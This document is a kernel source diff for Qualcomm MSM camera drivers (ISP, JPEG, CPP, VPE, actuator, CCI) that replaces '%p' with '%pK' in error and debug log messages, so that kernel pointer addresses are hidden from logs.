-@@ -1284,7 +1284,7 @@ static int  msm_isp_axi_stream_enable_cfg(
- 				!dual_vfe_res->axi_data[ISP_VFE0] ||
- 				!dual_vfe_res->vfe_base[ISP_VFE1] ||
- 				!dual_vfe_res->axi_data[ISP_VFE1]) {
--				pr_err("%s:%d failed vfe0 %p %p vfe %p %p\n",
-+				pr_err("%s:%d failed vfe0 %pK %pK vfe %pK %pK\n",
- 					__func__, __LINE__,
- 					dual_vfe_res->vfe_base[ISP_VFE0],
- 					dual_vfe_res->axi_data[ISP_VFE0],
-@@ -1659,7 +1659,7 @@ static int msm_isp_cfg_ping_pong_address(struct vfe_device *vfe_dev,
- 			!dual_vfe_res->axi_data[ISP_VFE0] ||
- 			!dual_vfe_res->vfe_base[ISP_VFE1] ||
- 			!dual_vfe_res->axi_data[ISP_VFE1]) {
--			pr_err("%s:%d failed vfe0 %p %p vfe %p %p\n",
-+			pr_err("%s:%d failed vfe0 %pK %pK vfe %pK %pK\n",
- 				__func__, __LINE__,
- 				dual_vfe_res->vfe_base[ISP_VFE0],
- 				dual_vfe_res->axi_data[ISP_VFE0],
-@@ -1940,7 +1940,7 @@ int msm_isp_drop_frame(struct vfe_device *vfe_dev,
- 	uint32_t pingpong_bit;
- 
- 	if (!vfe_dev || !stream_info || !ts || !sof_info) {
--		pr_err("%s %d vfe_dev %p stream_info %p ts %p op_info %p\n",
-+		pr_err("%s %d vfe_dev %pK stream_info %pK ts %pK op_info %pK\n",
- 			 __func__, __LINE__, vfe_dev, stream_info, ts,
- 			sof_info);
- 		return -EINVAL;
-@@ -2230,7 +2230,7 @@ int msm_isp_axi_reset(struct vfe_device *vfe_dev,
- 	unsigned long flags;
- 
- 	if (!reset_cmd) {
--		pr_err("%s: NULL pointer reset cmd %p\n", __func__, reset_cmd);
-+		pr_err("%s: NULL pointer reset cmd %pK\n", __func__, reset_cmd);
- 		rc = -1;
- 		return rc;
- 	}
-@@ -2928,7 +2928,7 @@ static int msm_isp_return_empty_buffer(struct vfe_device *vfe_dev,
- 	struct msm_isp_timestamp timestamp;
- 
- 	if (!vfe_dev || !stream_info) {
--		pr_err("%s %d failed: vfe_dev %p stream_info %p\n", __func__,
-+		pr_err("%s %d failed: vfe_dev %pK stream_info %pK\n", __func__,
- 			__LINE__, vfe_dev, stream_info);
- 		return -EINVAL;
- 	}
-@@ -3007,7 +3007,7 @@ static int msm_isp_request_frame(struct vfe_device *vfe_dev,
- 	bool dual_vfe = false;
- 
- 	if (!vfe_dev || !stream_info) {
--		pr_err("%s %d failed: vfe_dev %p stream_info %p\n", __func__,
-+		pr_err("%s %d failed: vfe_dev %pK stream_info %pK\n", __func__,
- 			__LINE__, vfe_dev, stream_info);
- 		return -EINVAL;
- 	}
-@@ -3659,7 +3659,7 @@ void msm_isp_axi_disable_all_wm(struct vfe_device *vfe_dev)
- 	int i, j;
- 
- 	if (!vfe_dev || !axi_data) {
--		pr_err("%s: error  %p %p\n", __func__, vfe_dev, axi_data);
-+		pr_err("%s: error  %pK %pK\n", __func__, vfe_dev, axi_data);
- 		return;
- 	}
- 
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-index 7eaffad..03c587e 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-@@ -88,8 +88,9 @@ static int msm_isp_stats_cfg_ping_pong_address(struct vfe_device *vfe_dev,
- 			!dual_vfe_res->stats_data[ISP_VFE0] ||
- 			!dual_vfe_res->vfe_base[ISP_VFE1] ||
- 			!dual_vfe_res->stats_data[ISP_VFE1]) {
--			pr_err("%s:%d error vfe0 %p %p vfe1 %p %p\n", __func__,
--				__LINE__, dual_vfe_res->vfe_base[ISP_VFE0],
-+			pr_err("%s:%d error vfe0 %pK %pK vfe1 %pK %pK\n",
-+				__func__, __LINE__,
-+				dual_vfe_res->vfe_base[ISP_VFE0],
- 				dual_vfe_res->stats_data[ISP_VFE0],
- 				dual_vfe_res->vfe_base[ISP_VFE1],
- 				dual_vfe_res->stats_data[ISP_VFE1]);
-@@ -156,7 +157,7 @@ static int32_t msm_isp_stats_buf_divert(struct vfe_device *vfe_dev,
- 	uint32_t stats_idx;
- 
- 	if (!vfe_dev || !ts || !buf_event || !stream_info) {
--		pr_err("%s:%d failed: invalid params %p %p %p %p\n",
-+		pr_err("%s:%d failed: invalid params %pK %pK %pK %pK\n",
- 			__func__, __LINE__, vfe_dev, ts, buf_event,
- 			stream_info);
- 		return -EINVAL;
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-index 5f1b208..dc209d7 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-@@ -468,14 +468,14 @@ static int msm_isp_get_max_clk_rate(struct vfe_device *vfe_dev, long *rate)
- 	long          round_rate = 0;
- 
- 	if (!vfe_dev || !rate) {
--		pr_err("%s:%d failed: vfe_dev %p rate %p\n", __func__, __LINE__,
--			vfe_dev, rate);
-+		pr_err("%s:%d failed: vfe_dev %pK rate %pK\n", __func__,
-+			__LINE__, vfe_dev, rate);
- 		return -EINVAL;
- 	}
- 
- 	*rate = 0;
- 	if (!vfe_dev->hw_info) {
--		pr_err("%s:%d failed: vfe_dev->hw_info %p\n", __func__,
-+		pr_err("%s:%d failed: vfe_dev->hw_info %pK\n", __func__,
- 			__LINE__, vfe_dev->hw_info);
- 		return -EINVAL;
- 	}
-@@ -505,13 +505,13 @@ static int msm_isp_get_clk_rates(struct vfe_device *vfe_dev,
- 	int32_t  rc = 0;
- 	uint32_t svs = 0, nominal = 0, turbo = 0;
- 	if (!vfe_dev || !rates) {
--		pr_err("%s:%d failed: vfe_dev %p rates %p\n", __func__,
-+		pr_err("%s:%d failed: vfe_dev %pK rates %pK\n", __func__,
- 			__LINE__, vfe_dev, rates);
- 		return -EINVAL;
- 	}
- 
- 	if (!vfe_dev->pdev) {
--		pr_err("%s:%d failed: vfe_dev->pdev %p\n", __func__,
-+		pr_err("%s:%d failed: vfe_dev->pdev %pK\n", __func__,
- 			__LINE__, vfe_dev->pdev);
- 		return -EINVAL;
- 	}
-@@ -519,7 +519,7 @@ static int msm_isp_get_clk_rates(struct vfe_device *vfe_dev,
- 	of_node = vfe_dev->pdev->dev.of_node;
- 
- 	if (!of_node) {
--		pr_err("%s %d failed: of_node = %p\n", __func__,
-+		pr_err("%s %d failed: of_node = %pK\n", __func__,
- 		 __LINE__, of_node);
- 		return -EINVAL;
- 	}
-@@ -728,7 +728,7 @@ static int msm_isp_set_dual_HW_master_slave_mode(
- 	unsigned long flags;
- 
- 	if (!vfe_dev || !arg) {
--		pr_err("%s: Error! Invalid input vfe_dev %p arg %p\n",
-+		pr_err("%s: Error! Invalid input vfe_dev %pK arg %pK\n",
- 			__func__, vfe_dev, arg);
- 		return -EINVAL;
- 	}
-@@ -819,7 +819,7 @@ static int msm_isp_proc_cmd_list_unlocked(struct vfe_device *vfe_dev, void *arg)
- 	struct msm_vfe_cfg_cmd_list cmd, cmd_next;
- 
- 	if (!vfe_dev || !arg) {
--		pr_err("%s:%d failed: vfe_dev %p arg %p", __func__, __LINE__,
-+		pr_err("%s:%d failed: vfe_dev %pK arg %pK", __func__, __LINE__,
- 			vfe_dev, arg);
- 		return -EINVAL;
- 	}
-@@ -889,7 +889,7 @@ static int msm_isp_proc_cmd_list_compat(struct vfe_device *vfe_dev, void *arg)
- 	struct msm_vfe_cfg_cmd2 current_cmd;
- 
- 	if (!vfe_dev || !arg) {
--		pr_err("%s:%d failed: vfe_dev %p arg %p", __func__, __LINE__,
-+		pr_err("%s:%d failed: vfe_dev %pK arg %pK", __func__, __LINE__,
- 			vfe_dev, arg);
- 		return -EINVAL;
- 	}
-@@ -946,10 +946,10 @@ static long msm_isp_ioctl_unlocked(struct v4l2_subdev *sd,
- 	struct vfe_device *vfe_dev = v4l2_get_subdevdata(sd);
- 
- 	if (!vfe_dev || !vfe_dev->vfe_base) {
--		pr_err("%s:%d failed: invalid params %p\n",
-+		pr_err("%s:%d failed: invalid params %pK\n",
- 			__func__, __LINE__, vfe_dev);
- 		if (vfe_dev)
--			pr_err("%s:%d failed %p\n", __func__,
-+			pr_err("%s:%d failed %pK\n", __func__,
- 				__LINE__, vfe_dev->vfe_base);
- 		return -EINVAL;
- 	}
-@@ -1134,10 +1134,10 @@ static long msm_isp_ioctl_compat(struct v4l2_subdev *sd,
- 	long rc = 0;
- 
- 	if (!vfe_dev || !vfe_dev->vfe_base) {
--		pr_err("%s:%d failed: invalid params %p\n",
-+		pr_err("%s:%d failed: invalid params %pK\n",
- 			__func__, __LINE__, vfe_dev);
- 		if (vfe_dev)
--			pr_err("%s:%d failed %p\n", __func__,
-+			pr_err("%s:%d failed %pK\n", __func__,
- 				__LINE__, vfe_dev->vfe_base);
- 		return -EINVAL;
- 	}
-@@ -1183,13 +1183,13 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 	uint32_t *cfg_data, uint32_t cmd_len)
- {
- 	if (!vfe_dev || !reg_cfg_cmd) {
--		pr_err("%s:%d failed: vfe_dev %p reg_cfg_cmd %p\n", __func__,
-+		pr_err("%s:%d failed: vfe_dev %pK reg_cfg_cmd %pK\n", __func__,
- 			__LINE__, vfe_dev, reg_cfg_cmd);
- 		return -EINVAL;
- 	}
- 	if ((reg_cfg_cmd->cmd_type != VFE_CFG_MASK) &&
- 		(!cfg_data || !cmd_len)) {
--		pr_err("%s:%d failed: cmd type %d cfg_data %p cmd_len %d\n",
-+		pr_err("%s:%d failed: cmd type %d cfg_data %pK cmd_len %d\n",
- 			__func__, __LINE__, reg_cfg_cmd->cmd_type, cfg_data,
- 			cmd_len);
- 		return -EINVAL;
-@@ -1856,7 +1856,7 @@ static int msm_isp_process_iommu_page_fault(struct vfe_device *vfe_dev)
- {
- 	int rc = vfe_dev->buf_mgr->pagefault_debug_disable;
- 
--	pr_err("%s:%d] VFE%d Handle Page fault! vfe_dev %p\n", __func__,
-+	pr_err("%s:%d] VFE%d Handle Page fault! vfe_dev %pK\n", __func__,
- 		__LINE__,  vfe_dev->pdev->id, vfe_dev);
- 
- 	msm_isp_halt_send_error(vfe_dev, ISP_EVENT_IOMMU_P_FAULT);
-@@ -2048,7 +2048,7 @@ void msm_isp_do_tasklet(unsigned long data)
- 	uint32_t irq_status0, irq_status1, pingpong_status;
- 
- 	if (vfe_dev->vfe_base == NULL || vfe_dev->vfe_open_cnt == 0) {
--		ISP_DBG("%s: VFE%d open cnt = %d, device closed(base = %p)\n",
-+		ISP_DBG("%s: VFE%d open cnt = %d, device closed(base = %pK)\n",
- 			__func__, vfe_dev->pdev->id, vfe_dev->vfe_open_cnt,
- 			vfe_dev->vfe_base);
- 		return;
-@@ -2121,7 +2121,7 @@ static void msm_vfe_iommu_fault_handler(struct iommu_domain *domain,
- 		vfe_dev->page_fault_addr = iova;
- 		if (!vfe_dev->buf_mgr || !vfe_dev->buf_mgr->ops ||
- 			!vfe_dev->axi_data.num_active_stream) {
--			pr_err("%s:%d buf_mgr %p active strms %d\n", __func__,
-+			pr_err("%s:%d buf_mgr %pK active strms %d\n", __func__,
- 				__LINE__, vfe_dev->buf_mgr,
- 				vfe_dev->axi_data.num_active_stream);
- 			goto end;
-@@ -2138,7 +2138,7 @@ static void msm_vfe_iommu_fault_handler(struct iommu_domain *domain,
- 		}
- 		mutex_unlock(&vfe_dev->core_mutex);
- 	} else {
--		ISP_DBG("%s:%d] no token received: %p\n",
-+		ISP_DBG("%s:%d] no token received: %pK\n",
- 			__func__, __LINE__, token);
- 		goto end;
- 	}
-@@ -2173,7 +2173,7 @@ int msm_isp_open_node(struct v4l2_subdev *sd, struct v4l2_subdev_fh *fh)
- 	}
- 
- 	if (vfe_dev->vfe_base) {
--		pr_err("%s:%d invalid params cnt %d base %p\n", __func__,
-+		pr_err("%s:%d invalid params cnt %d base %pK\n", __func__,
- 			__LINE__, vfe_dev->vfe_open_cnt, vfe_dev->vfe_base);
- 		vfe_dev->vfe_base = NULL;
- 	}
-diff --git a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-index 640379d..abfae4f 100644
---- a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-+++ b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-@@ -1292,7 +1292,7 @@ static int msm_ispif_set_vfe_info(struct ispif_device *ispif,
- {
- 	if (!vfe_info || (vfe_info->num_vfe == 0) ||
- 		(vfe_info->num_vfe > ispif->hw_num_isps)) {
--		pr_err("Invalid VFE info: %p %d\n", vfe_info,
-+		pr_err("Invalid VFE info: %pK %d\n", vfe_info,
- 			   (vfe_info ? vfe_info->num_vfe : 0));
- 		return -EINVAL;
- 	}
-@@ -1327,7 +1327,7 @@ static int msm_ispif_init(struct ispif_device *ispif,
- 
- 	if (ispif->csid_version >= CSID_VERSION_V30) {
- 		if (!ispif->clk_mux_mem || !ispif->clk_mux_io) {
--			pr_err("%s csi clk mux mem %p io %p\n", __func__,
-+			pr_err("%s csi clk mux mem %pK io %pK\n", __func__,
- 				ispif->clk_mux_mem, ispif->clk_mux_io);
- 			rc = -ENOMEM;
- 			return rc;
-diff --git a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c
-index 9339029..071ce0a 100644
---- a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c
-+++ b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -805,7 +805,7 @@ void msm_jpeg_hw_write(struct msm_jpeg_hw_cmd *hw_cmd_p,
- 
- 	new_data = hw_cmd_p->data & hw_cmd_p->mask;
- 	new_data |= old_data;
--	JPEG_DBG("%s:%d] %p %08x\n", __func__, __LINE__,
-+	JPEG_DBG("%s:%d] %pK %08x\n", __func__, __LINE__,
- 		paddr, new_data);
- 	msm_camera_io_w(new_data, paddr);
- }
-@@ -908,7 +908,7 @@ void msm_jpeg_io_dump(void *base, int size)
- 	int i;
- 	u32 *p = (u32 *) addr;
- 	u32 data;
--	JPEG_DBG_HIGH("%s:%d] %p %d", __func__, __LINE__, addr, size);
-+	JPEG_DBG_HIGH("%s:%d] %pK %d", __func__, __LINE__, addr, size);
- 	line_str[0] = '\0';
- 	p_str = line_str;
- 	for (i = 0; i < size/4; i++) {
-diff --git a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_platform.c b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_platform.c
-index e076d35..266a5a6 100644
---- a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_platform.c
-+++ b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_platform.c
-@@ -210,7 +210,7 @@ static int32_t msm_jpeg_set_init_dt_parms(struct msm_jpeg_device *pgmn_dev,
- 			return -EINVAL;
- 		}
- 		for (i = 0; i < dt_count; i = i + 2) {
--			JPEG_DBG("%s:%d] %p %08x\n",
-+			JPEG_DBG("%s:%d] %pK %08x\n",
- 					__func__, __LINE__,
- 					base + dt_reg_settings[i],
- 					dt_reg_settings[i + 1]);
-diff --git a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c
-index 2e2841a..d27f56a 100644
---- a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c
-+++ b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c
-@@ -754,7 +754,7 @@ int __msm_jpeg_open(struct msm_jpeg_device *pgmn_dev)
- 			__LINE__, rc);
- 		goto platform_init_fail;
- 	}
--	JPEG_DBG("%s:%d] platform resources - base %p, irq %d\n",
-+	JPEG_DBG("%s:%d] platform resources - base %pK, irq %d\n",
- 		__func__, __LINE__,
- 		pgmn_dev->base, (int)pgmn_dev->jpeg_irq_res->start);
- 	msm_jpeg_q_cleanup(&pgmn_dev->evt_q);
-diff --git a/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_hw.c b/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_hw.c
-index 4108693..f3ceaad 100644
---- a/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_hw.c
-+++ b/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_hw.c
-@@ -93,7 +93,7 @@ static inline u32 msm_jpegdma_hw_read_reg(struct msm_jpegdma_device *dma,
- static inline void msm_jpegdma_hw_write_reg(struct msm_jpegdma_device *dma,
- 	enum msm_jpegdma_mem_resources base_idx, u32 reg, u32 value)
- {
--	pr_debug("%s:%d]%p %08x\n", __func__, __LINE__,
-+	pr_debug("%s:%d]%pK %08x\n", __func__, __LINE__,
- 		dma->iomem_base[base_idx] + reg,
- 		value);
- 	msm_camera_io_w(value, dma->iomem_base[base_idx] + reg);
-diff --git a/drivers/media/platform/msm/camera_v2/msm_vb2/msm_vb2.c b/drivers/media/platform/msm/camera_v2/msm_vb2/msm_vb2.c
-index f7246f2..0e4a453 100644
---- a/drivers/media/platform/msm/camera_v2/msm_vb2/msm_vb2.c
-+++ b/drivers/media/platform/msm/camera_v2/msm_vb2/msm_vb2.c
-@@ -248,7 +248,7 @@ static int msm_vb2_put_buf(struct vb2_buffer *vb, int session_id,
- 				break;
- 		}
- 		if (WARN_ON(vb2_buf != vb)) {
--			pr_err("VB buffer is INVALID vb=%p, ses_id=%d, str_id=%d\n",
-+			pr_err("VB buffer is INVALID vb=%pK, ses_id=%d, str_id=%d\n",
- 					vb, session_id, stream_id);
- 			spin_unlock_irqrestore(&stream->stream_lock, flags);
- 			return -EINVAL;
-@@ -290,7 +290,7 @@ static int msm_vb2_buf_done(struct vb2_buffer *vb, int session_id,
- 				break;
- 		}
- 		if (WARN_ON(vb2_buf != vb)) {
--			pr_err("VB buffer is INVALID ses_id=%d, str_id=%d, vb=%p\n",
-+			pr_err("VB buffer is INVALID ses_id=%d, str_id=%d, vb=%pK\n",
- 				    session_id, stream_id, vb);
- 			spin_unlock_irqrestore(&stream->stream_lock, flags);
- 			return -EINVAL;
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index 55fc18e..3ee49db 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -148,7 +148,7 @@ void msm_cpp_vbif_register_error_handler(void *dev,
- 	int (*client_vbif_error_handler)(void *, uint32_t))
- {
- 	if (dev == NULL || client >= VBIF_CLIENT_MAX) {
--		pr_err("%s: Fail to register handler! dev = %p, client %d\n",
-+		pr_err("%s: Fail to register handler! dev = %pK,client %d\n",
- 			__func__, dev, client);
- 		return;
- 	}
-@@ -1054,7 +1054,7 @@ int cpp_vbif_error_handler(void *dev, uint32_t vbif_error)
- 	struct cpp_device *cpp_dev = NULL;
- 
- 	if (dev == NULL || vbif_error >= CPP_VBIF_ERROR_MAX) {
--		pr_err("failed: dev %p, vbif error %d\n", dev, vbif_error);
-+		pr_err("failed: dev %pK,vbif error %d\n", dev, vbif_error);
- 		return -EINVAL;
- 	}
- 
-@@ -1083,13 +1083,13 @@ static int cpp_open_node(struct v4l2_subdev *sd, struct v4l2_subdev_fh *fh)
- 	CPP_DBG("E\n");
- 
- 	if (!sd || !fh) {
--		pr_err("Wrong input parameters sd %p fh %p!",
-+		pr_err("Wrong input parameters sd %pK fh %pK!",
- 			sd, fh);
- 		return -EINVAL;
- 	}
- 	cpp_dev = v4l2_get_subdevdata(sd);
- 	if (!cpp_dev) {
--		pr_err("failed: cpp_dev %p\n", cpp_dev);
-+		pr_err("failed: cpp_dev %pK\n", cpp_dev);
- 		return -EINVAL;
- 	}
- 	mutex_lock(&cpp_dev->mutex);
-@@ -1112,7 +1112,7 @@ static int cpp_open_node(struct v4l2_subdev *sd, struct v4l2_subdev_fh *fh)
- 		return -ENODEV;
- 	}
- 
--	CPP_DBG("open %d %p\n", i, &fh->vfh);
-+	CPP_DBG("open %d %pK\n", i, &fh->vfh);
- 	cpp_dev->cpp_open_cnt++;
- 	if (cpp_dev->cpp_open_cnt == 1) {
- 		rc = cpp_init_hardware(cpp_dev);
-@@ -1158,7 +1158,7 @@ static int cpp_close_node(struct v4l2_subdev *sd, struct v4l2_subdev_fh *fh)
- 	cpp_dev =  v4l2_get_subdevdata(sd);
- 
- 	if (!cpp_dev) {
--		pr_err("failed: cpp_dev %p\n", cpp_dev);
-+		pr_err("failed: cpp_dev %pK\n", cpp_dev);
- 		return -EINVAL;
- 	}
- 
-@@ -1446,7 +1446,7 @@ static void msm_cpp_do_timeout_work(struct work_struct *work)
- 	mutex_lock(&cpp_dev->mutex);
- 
- 	if (!work || (cpp_timer.data.cpp_dev->state != CPP_STATE_ACTIVE)) {
--		pr_err("Invalid work:%p or state:%d\n", work,
-+		pr_err("Invalid work:%pK or state:%d\n", work,
- 			cpp_timer.data.cpp_dev->state);
- 		/* Do not flush queue here as it is not a fatal error */
- 		goto end;
-@@ -2512,7 +2512,7 @@ static int msm_cpp_copy_from_ioctl_ptr(void *dst_ptr,
- {
- 	int ret;
- 	if ((ioctl_ptr->ioctl_ptr == NULL) || (ioctl_ptr->len == 0)) {
--		pr_err("%s: Wrong ioctl_ptr %p / len %zu\n", __func__,
-+		pr_err("%s: Wrong ioctl_ptr %pK / len %zu\n", __func__,
- 			ioctl_ptr, ioctl_ptr->len);
- 		return -EINVAL;
- 	}
-@@ -2535,7 +2535,7 @@ static int msm_cpp_copy_from_ioctl_ptr(void *dst_ptr,
- {
- 	int ret;
- 	if ((ioctl_ptr->ioctl_ptr == NULL) || (ioctl_ptr->len == 0)) {
--		pr_err("%s: Wrong ioctl_ptr %p / len %zu\n", __func__,
-+		pr_err("%s: Wrong ioctl_ptr %pK / len %zu\n", __func__,
- 			ioctl_ptr, ioctl_ptr->len);
- 		return -EINVAL;
- 	}
-@@ -2607,14 +2607,14 @@ static int msm_cpp_validate_input(unsigned int cmd, void *arg,
- 		break;
- 	default: {
- 		if (ioctl_ptr == NULL) {
--			pr_err("Wrong ioctl_ptr %p\n", ioctl_ptr);
-+			pr_err("Wrong ioctl_ptr %pK\n", ioctl_ptr);
- 			return -EINVAL;
- 		}
- 
- 		*ioctl_ptr = arg;
- 		if ((*ioctl_ptr == NULL) ||
- 			((*ioctl_ptr)->ioctl_ptr == NULL)) {
--			pr_err("Wrong arg %p\n", arg);
-+			pr_err("Wrong arg %pK\n", arg);
- 			return -EINVAL;
- 		}
- 		break;
-@@ -2631,7 +2631,7 @@ long msm_cpp_subdev_ioctl(struct v4l2_subdev *sd,
- 	int rc = 0;
- 
- 	if (sd == NULL) {
--		pr_err("sd %p\n", sd);
-+		pr_err("sd %pK\n", sd);
- 		return -EINVAL;
- 	}
- 	cpp_dev = v4l2_get_subdevdata(sd);
-@@ -2707,7 +2707,7 @@ long msm_cpp_subdev_ioctl(struct v4l2_subdev *sd,
- 				&cpp_dev->pdev->dev);
- 			if (rc) {
- 				dev_err(&cpp_dev->pdev->dev,
--					"Fail to loc blob %s dev %p, rc:%d\n",
-+					"Fail to loc blob %s dev %pK, rc:%d\n",
- 					cpp_dev->fw_name_bin,
- 					&cpp_dev->pdev->dev, rc);
- 				kfree(cpp_dev->fw_name_bin);
-@@ -3170,14 +3170,15 @@ static long msm_cpp_subdev_do_ioctl(
- 	struct v4l2_fh *vfh = NULL;
- 
- 	if ((arg == NULL) || (file == NULL)) {
--		pr_err("Invalid input parameters arg %p, file %p\n", arg, file);
-+		pr_err("Invalid input parameters arg %pK, file %pK\n",
-+			arg, file);
- 		return -EINVAL;
- 	}
- 	vdev = video_devdata(file);
- 	sd = vdev_to_v4l2_subdev(vdev);
- 
- 	if (sd == NULL) {
--		pr_err("Invalid input parameter sd %p\n", sd);
-+		pr_err("Invalid input parameter sd %pK\n", sd);
- 		return -EINVAL;
- 	}
- 	vfh = file->private_data;
-@@ -3451,7 +3452,7 @@ static long msm_cpp_subdev_fops_compat_ioctl(struct file *file,
- 	}
- 	cpp_dev = v4l2_get_subdevdata(sd);
- 	if (!vdev || !cpp_dev) {
--		pr_err("Invalid vdev %p or cpp_dev %p structures!",
-+		pr_err("Invalid vdev %pK or cpp_dev %pK structures!",
- 			vdev, cpp_dev);
- 		return -EINVAL;
- 	}
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/vpe/msm_vpe.c b/drivers/media/platform/msm/camera_v2/pproc/vpe/msm_vpe.c
-index bf4d359..f2f1dca 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/vpe/msm_vpe.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/vpe/msm_vpe.c
-@@ -56,12 +56,12 @@ static void vpe_mem_dump(const char * const name, const void * const addr,
- 	int i;
- 	u32 *p = (u32 *) addr;
- 	u32 data;
--	VPE_DBG("%s: (%s) %p %d\n", __func__, name, addr, size);
-+	VPE_DBG("%s: (%s) %pK %d\n", __func__, name, addr, size);
- 	line_str[0] = '\0';
- 	p_str = line_str;
- 	for (i = 0; i < size/4; i++) {
- 		if (i % 4 == 0) {
--			snprintf(p_str, 12, "%p: ", p);
-+			snprintf(p_str, 12, "%pK: ", p);
- 			p_str += 10;
- 		}
- 		data = *p++;
-@@ -614,7 +614,7 @@ static int vpe_open_node(struct v4l2_subdev *sd, struct v4l2_subdev_fh *fh)
- 		goto err_mutex_unlock;
- 	}
- 
--	VPE_DBG("open %d %p\n", i, &fh->vfh);
-+	VPE_DBG("open %d %pK\n", i, &fh->vfh);
- 	vpe_dev->vpe_open_cnt++;
- 	if (vpe_dev->vpe_open_cnt == 1) {
- 		rc = vpe_init_hardware(vpe_dev);
-@@ -669,7 +669,7 @@ static int vpe_close_node(struct v4l2_subdev *sd, struct v4l2_subdev_fh *fh)
- 		return -ENODEV;
- 	}
- 
--	VPE_DBG("close %d %p\n", i, &fh->vfh);
-+	VPE_DBG("close %d %pK\n", i, &fh->vfh);
- 	vpe_dev->vpe_open_cnt--;
- 	if (vpe_dev->vpe_open_cnt == 0) {
- 		vpe_deinit_mem(vpe_dev);
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-index 0ad3d9a..c33e66f 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-@@ -583,7 +583,7 @@ static int32_t msm_actuator_move_focus(
- 	if ((a_ctrl->region_size <= 0) ||
- 		(a_ctrl->region_size > MAX_ACTUATOR_REGION) ||
- 		(!move_params->ringing_params)) {
--		pr_err("Invalid-region size = %d, ringing_params = %p\n",
-+		pr_err("Invalid-region size = %d, ringing_params = %pK\n",
- 		a_ctrl->region_size, move_params->ringing_params);
- 		return -EFAULT;
- 	}
-@@ -703,7 +703,7 @@ static int32_t msm_actuator_bivcm_move_focus(
- 	if ((a_ctrl->region_size <= 0) ||
- 		(a_ctrl->region_size > MAX_ACTUATOR_REGION) ||
- 		(!move_params->ringing_params)) {
--		pr_err("Invalid-region size = %d, ringing_params = %p\n",
-+		pr_err("Invalid-region size = %d, ringing_params = %pK\n",
- 		a_ctrl->region_size, move_params->ringing_params);
- 		return -EFAULT;
- 	}
-@@ -1516,7 +1516,7 @@ static long msm_actuator_subdev_ioctl(struct v4l2_subdev *sd,
- 	struct msm_actuator_ctrl_t *a_ctrl = v4l2_get_subdevdata(sd);
- 	void __user *argp = (void __user *)arg;
- 	CDBG("Enter\n");
--	CDBG("%s:%d a_ctrl %p argp %p\n", __func__, __LINE__, a_ctrl, argp);
-+	CDBG("%s:%d a_ctrl %pK argp %pK\n", __func__, __LINE__, a_ctrl, argp);
- 	switch (cmd) {
- 	case VIDIOC_MSM_SENSOR_GET_SUBDEV_ID:
- 		return msm_actuator_get_subdev_id(a_ctrl, argp);
-@@ -1777,7 +1777,7 @@ static int32_t msm_actuator_i2c_probe(struct i2c_client *client,
- 		goto probe_failure;
- 	}
- 
--	CDBG("client = 0x%p\n",  client);
-+	CDBG("client = 0x%pK\n",  client);
- 
- 	rc = of_property_read_u32(client->dev.of_node, "cell-index",
- 		&act_ctrl_t->subdev_id);
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-index 7099d9f..817870e 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-@@ -945,7 +945,7 @@ static int32_t msm_cci_i2c_read_bytes(struct v4l2_subdev *sd,
- 	uint16_t read_bytes = 0;
- 
- 	if (!sd || !c_ctrl) {
--		pr_err("%s:%d sd %p c_ctrl %p\n", __func__,
-+		pr_err("%s:%d sd %pK c_ctrl %pK\n", __func__,
- 			__LINE__, sd, c_ctrl);
- 		return -EINVAL;
- 	}
